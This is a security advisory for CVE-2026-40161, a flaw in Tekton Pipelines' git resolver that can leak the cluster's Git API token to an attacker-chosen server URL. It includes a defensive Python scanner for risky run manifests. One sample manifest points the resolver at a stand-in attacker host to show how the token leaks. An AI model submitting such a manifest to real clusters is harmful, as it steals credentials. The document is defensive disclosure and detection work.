API Token Exposure in Tekton Pipelines by Tekton
CVE-2026-40161

7.7 HIGH

Key Information:

Vendor: Tektoncd
Status: Vendor
CVE Published: 21 April 2026

What is CVE-2026-40161?

Tekton Pipelines, a project that runs CI/CD workflows as Kubernetes resources, contains a vulnerability in its git resolver. In the affected versions (1.0.0 through 1.10.0), when a user omits the token parameter, the system-configured Git API token may unintentionally be sent to the user-supplied server URL, which can be attacker-controlled. A malicious actor with permission to create a TaskRun or PipelineRun can exploit this weakness to exfiltrate sensitive tokens, such as GitHub or GitLab Personal Access Tokens (PATs), by pointing the resolver at an endpoint they control. This exposure is a serious risk to the integrity of CI/CD workflows and requires immediate action to secure affected configurations.
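A defender-side check for the pattern described above, added here as an illustrative example that is not part of the advisory or of the Tekton project: it scans run manifests (already parsed from YAML or JSON into dicts) for git-resolver references that set a custom server URL without a per-run token, the combination that would trigger the fallback to the cluster-wide token. The `resolver: git` selector, the `serverURL` and `token` param names, and the allowed-host list are assumptions, not values taken from the page.

```python
"""Flag PipelineRun/TaskRun manifests whose git-resolver reference sets a custom
serverURL but no token param, so the resolver would fall back to the cluster-wide
API token and send it to that URL (the CVE-2026-40161 pattern).
Assumed (not on the advisory page): the resolver is selected with resolver: git
and takes serverURL and token params; ALLOWED_HOSTS is an example policy value."""
from urllib.parse import urlparse

# Hosts approved to receive the cluster-wide token; anything else is untrusted.
ALLOWED_HOSTS = {"api.github.com", "gitlab.example.internal"}

def _params(ref):
    """Turn a taskRef/pipelineRef params list into a name -> value dict."""
    return {p.get("name"): p.get("value") for p in ref.get("params", [])}

def _refs(spec):
    """Yield every resolver reference in a run spec: the top-level
    taskRef/pipelineRef plus tasks embedded in an inline pipelineSpec."""
    for key in ("taskRef", "pipelineRef"):
        if key in spec:
            yield spec[key]
    for task in spec.get("pipelineSpec", {}).get("tasks", []):
        if "taskRef" in task:
            yield task["taskRef"]

def findings(manifest):
    """Return the list of risky git-resolver references in one manifest."""
    out = []
    for ref in _refs(manifest.get("spec", {})):
        if ref.get("resolver") != "git":
            continue
        params = _params(ref)
        server = params.get("serverURL")
        if server is None or "token" in params:
            continue  # default server, or caller-supplied token: no fallback
        host = urlparse(server).hostname  # None for a malformed URL -> flagged
        if host not in ALLOWED_HOSTS:
            out.append(f"{manifest.get('kind')}: serverURL={server} without "
                       f"token; cluster token would be sent to {host}")
    return out

# Constructed samples (not from the advisory): one risky, one acceptable.
RISKY_RUN = {"kind": "TaskRun", "spec": {"taskRef": {"resolver": "git", "params": [
    {"name": "url", "value": "https://github.com/org/repo.git"},
    {"name": "serverURL", "value": "https://git.attacker.example"},
    {"name": "pathInRepo", "value": "task.yaml"}]}}}
SAFE_RUN = {"kind": "PipelineRun", "spec": {"pipelineSpec": {"tasks": [{"name": "build",
    "taskRef": {"resolver": "git", "params": [
    {"name": "serverURL", "value": "https://gitlab.example.internal"},
    {"name": "token", "value": "my-token-secret"}]}}]}}}
```

The same rule is a natural fit for an admission policy, where rejecting the run is preferable to reporting it after the token has already been sent.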

Affected Version(s)

pipeline >= 1.0.0, <= 1.10.0

CVSS V3.1

Score: 7.7
Severity: HIGH
Confidentiality: High
Integrity: None
Availability: High
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved
